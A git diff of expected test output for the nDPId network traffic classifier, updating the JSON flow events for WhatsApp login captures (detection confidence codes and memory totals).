+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1432582258587,"flow_last_seen":1432582267438,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00844{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1432582230648,"flow_last_seen":1432582264928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15484,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"}} +00844{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1432582355253,"flow_last_seen":1432582356195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7941,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"}} 00581{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","packets-captured":1253,"packets-processed":1251,"total-skipped-flows":0,"total-l4-payload-len":132660,"total-not-detected-flows":0,"total-guessed-flows":20,"total-detected-flows":37,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":57,"total-idle-flows":57,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":348,"global_ts_msec":1432582361929} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1253/1251 @@ -354,9 +354,9 @@ ~~ total active/idle flows...: 57/57 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5993905 bytes -~~ total memory freed........: 5993905 bytes -~~ total allocations/frees...: 119599/119599 +~~ total memory allocated....: 6127539 bytes +~~ total memory freed........: 6127539 bytes +~~ total allocations/frees...: 122361/122361 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 2437 chars diff --git a/test/results/whatsapp_login_chat.pcap.out b/test/results/whatsapp_login_chat.pcap.out index d440e4cb1..e140b9a96 100644 --- a/test/results/whatsapp_login_chat.pcap.out +++ b/test/results/whatsapp_login_chat.pcap.out @@ -2,52 +2,52 @@ 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1432582377898} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582377898,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432582377898,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582377898,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI56kAAEARDKvAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582377898,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582377898,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432582379543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1432582379543,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA+Df0AAEAR51zAqAIEwKgCAfEBADUAKg3CrIsBAAABAAAAAAAAA2UxMgh3aGF0c2FwcANuZXQAAAEAAQ=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432582379571,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1432582379571,"pkt":"APS5Jrv0xiwDYGpkCABFAAC+Me8AAEARwurAqAIBwKgCBAA18QEAqrdkrIuBgAABAAgAAAAAA2UxMgh3aGF0c2FwcANuZXQAAAEAAcAMAAEAAQAAAiQABLitsy\/ADAABAAEAAAIkAASeVTpnwAwAAQABAAACJAAEuK2zLMAMAAEAAQAAAiQABLitsyPADAABAAEAAAIkAARsqLDGwAwAAQABAAACJAAEnlU6NMAMAAEAAQAAAiQABJ5VOg\/ADAABAAEAAAIkAASeVTol"} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582379571,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.173.179.47"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582379571,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.173.179.47"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379591,"flow_last_seen":1432582379591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582379591,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432582379591,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582379591,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAjylAAEAGEH7AqAIEnlU6D8A2FGYksXJ9AAAAALAC\/\/+BgwAAAgQFtAEDAwQBAQgKLfyAogAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432582379745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582379745,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8XOEAADUGjcqeVToPwKgCBBRmwDYfJVHSJLFyfqAS\/\/8RNgAAAgQFrAEDAwkEAggKXZ2yry38gKI="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432582379848,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582379848,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0bGhAAEAGM0vAqAIEnlU6D8A2FGYksXJ+HyVR04AQIFgeowAAAQEICi38gaNdnbKv"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582379591,"flow_last_seen":1432582380392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582380392,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582379591,"flow_last_seen":1432582380392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582380392,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXIltFAAEAGh5\/AqAIEEa1CZsA1Abt+clmMpMYxPVAQQABXnAAAFwMDB3i+HiPgShCayKsiCSxppt+UVMG6sNLf32XwXp\/5y1\/Gi93F3S41DWF8\/kCqCE3bWkUsOQ\/D44TQ+2n51pbyMSPLw0aW5BBc1KN+NXFB6c0\/EvLUkiCkXMNnoBikvRGoWqnT3MsBLR3ifxEfJkx0KA0FgI9JutlWbXDDUTzCRBEZTuRft2ygLhc453pAbiPG9v0WPMDLHXiyCBIVg\/B5dK4qKFD6E2UMKFMhu4mZRR2j\/6qxWlXTvDrMGoz+8Qo7VA74VXDOmIIqRacL+CmsjHCFgzIlevE9HbzQStt3waOocRqfRvIAnyjErcnsgCXougYuTv7e+MXADNmAZBilIIoi3Uil6da7kvrxaXQ4p+uZdx7Gy5yoHJv8xUlpNlf\/6TnuDJ0Sr34mxp2ViDhiTjdQbwAa3oxSYIriERZCD+iy2XBPrLEva6gxIYSFoMA1nMvNEDvwHAwVpPX12H1IQq6zqjIg+g2T3TBZpcZ71NLHtrlkBg9o5NZd7LL0MCoUc5LF5gFQhEphIEtekSiwBF\/vWaUkYpAxP7LvgNiCoLKAfwM9RyhmY\/groOK8zq86A8Z\/A5kmVimU2YKg3RBFJIj4fY5ZjJv5w7NZlJ5I4tkbJJp4AoKwuThn7szdjjoI\/Gz6k3Cz8YZmXMOwDviwyDpLeaUvIrJPOa1ciNsy0vHmM7ukkMbC8Ej95C27cDvULH7dL6T0XGOtlAh\/1i8BfnuG9hN4cxa\/b+5gAAhOFw1eAAyMGcUy23P+89rorZ3KMrek+vuNcICgkwnazh1Z5AFtIzlWlMfxbaxy\/+pJoR3DnO0EuyOOHz4IdCogPPXsieGyIHTaGzpebRd3ow8OikTIF2RiPLnkFeI25KqwWpGL6weTaFVmxqKuafYQNbLXqeb1mf\/DlBl7xTHdJ\/K7sh+ashtIQDjtOnXuANeb1sDwla5nv+DnrsBoezknxm9kI8r\/CTGWQN\/tTHUBQ3JnQu2sU3BgKQv67idjs6\/xEGKN0fSceO\/OmdSiRN4eY5AKeqGiRb0iQcOp0eoO0nHkil+B5uKPiznWHrrsTIB9dEBiXQpdbXNu0tyB5osy9qzKMkf\/o9uJ+QSQ5cIo7DjRzFZnpJOkCxvvXWU+FpzDhZxIpMTrOA0QqAGTa21N2fhnR7KTBe68GBzD362LyujtxvtI68Y+e4qwU8QRYv94bSptDA1mC5d7hLaair0kLj5FJuw9fQYw56jdCBuIztl42Q9ip+eJzWCXzcqrMuxyZhMkusneUAU213bxe7LIroTzopLTvDr1KXzVypQq1ZP5NCiggcKfqeKZidfD+aXqLGRh7olUlGpaHuqy1maaxpidAIrK\/rniCznE3Y8bsAPAq11XlkH+mjEIj4B5Et\/0lF+xCPP+z5E9ZGqKuPoSIYCKQzbemYTMMkhnWOl6BB5kOc48mQHXcM\/HEeMKQ4qb33pU8bbK3Mr9Vb0pzxFXpDLLr1AV4WOOsDEdqZRvrHbAGGit7Ox3YtWydJ61deheU2gY0jifGxvWb6TKpitF7KENLzDKe6R1+jkekRnLVGAoiZ6cidxCTodgPGJaODRed4KQauNt6lzH+E+PJp48Tc7z95H2uvpzfMxaqZdwBSkB4v4ScjVowzkErkvUxVQNOveEwAJQDuk\/MJnrSUEivzWnCcp3a+GPlrKE2YjKybAPuXK8NmegG3utqM2DgTsUTgCNR+3ESE1g9tqjPpb6WMGMIfSBz2fb5tlr8mBN4CEu0H72FkFaOVAQvrDFdSC9uWsLI+9xr\/qifTPscJiK47gZwd7xJ1+AvgSKzzkjQwgSwyGtffBvX0O0GlFuSMAxYjLubFvVAvKhF6gkJ9oPlwZ9pkLOs5hTGXcjvBfkdt78lFxJQl3eijMQRas5LDn3A9Tn53tCW5oXAuOYXz4b"} 01106{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":531,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":531,"pkt_l4_len":497,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIFAqxAAEAGH4jAqAIEEa1CZsA1Abt+cl8spMYxPVAYQAAK4wAA+zXxkGmxqmlJcwlR7TpHpRtDDy9iaRt9w+hOFsERXuy8gwV22TTGXYqWLP3aSg0FRpPNh6b2JxTA9OSkJEk04NCfWqJRauLthWRuA7XoVn8i6Smk+coAOa3u15Yq91KVTfK0Likn42RkhoMCTU67u6i6Y4GW7d7uWiM6L3uLokbbGTmGs29u3afEGnNWZwLcuyp6rGxmPmWxvxgkiNCzEIsj5+jDbrTqLXDyyF322ZG7ztnAr92I1EUwbaElkdT9P28rYnazLdDX3NtrMNZoVpJg+JtJ\/7kZqQ2Wqzmg\/a3xXi4EVY3r6CTewAoUnubR3Qb8d8SxZWO8dXB980UXO8ObJWaEL5I20Sp30w7kYXi8hv4VgTLwR\/5GH+diyQKZuXNNplXdUL9qR0BnzfYHcTgjG28TOg74dTk611xDBeVR4Itg6rhO4EXCbpfiRmK6bb3CXGkaTCMHxUnezI+xc2Wog+XxCXrGyOiN2uGEyOBaMLxsAdU\/WfMK5Hg2kk6QV97kZZAhmz0GEeQIuwbiHtXsFgOmiLHGkBFU3uvrL2U0AIsy\/dg28ProYM\/UVKotXUmjaEkwo4XPHqyzoqhSMSd8fGbpRTWD+Jj7SG1OLSQLZ6OzyLhulPpesWWw"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"flow_min_l4_payload_len":477,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":958,"midstream":1,"thread_ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"flow_min_l4_payload_len":477,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":958,"midstream":1,"thread_ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 01222{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432582381179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":610,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":610,"pkt_l4_len":576,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAJULUhAAEAG9JzAqAIEEa1CZsA1Abt+cmEJpMYxPVAYQAAkaQAAFwMDAifRP6n1iN3uB\/Uhy6B3MN22nTeVXJRqDhAyLGWagzjVPV67eGMiWlDpxIYk9ZRXb8ENyJMklAVg5qQxAfredM796d1woE5CM\/dDlnC9hhfBLqlOMT0Sc23vnR6S0CtE+vcI2IEc50YYFIr8cCuBcLPUtehQ+6FiIBzPUNdC8gBpCK0l8ehCaB6UsJ+9Lz+rqI7LymD80O7JD9GQGlEzf0ROrOYPwKN9oloslBYMUuNcVtuTSnZlQf6clnYgiVqjkPEIWZnj1\/SzJxC0XzXDZTCazzjZUphrvHsUFVKI\/iQfQLn2Pm20z\/bY+umTrESbc\/Rb\/jTAxKkWPlTguW5QNPTgHe+8CLbu8GlNIUhp6XnzV0lotZMlMuaBJakvd6GmWA8qWeiSGeNI8Nxabsp54T+pQf+cFTWMVSzn894mO+DZZ3gtq32z87kDjYiMhE2jHBbOrnjFvxmtQtZu7lyboSLDYh55cOzJECLrbK8MSRuDtHOP5G6iepYtPwv3WMGLCV+hTD9hULIUKlQnW8NxmNPf6x7m2WXh+T5KFO1k2GNZTSM8sWZLLJiGPB3r5p1nS3ObF9UaRS1rU\/+0JK5FT6PVQl\/T6rcJ66cGodbOS0a03YtqhfdlphEfqQSNy4IBPyE7+TYhqlI5kH8vw+oFYBVtxUinzFEEO03Tz6ey1LN8P\/4vb9rv1pyNfFxaNarK\/6\/1noAhKaU7nGWU\/L6Er+GI\/BOXYTn7Ng=="} -00659{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00659{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 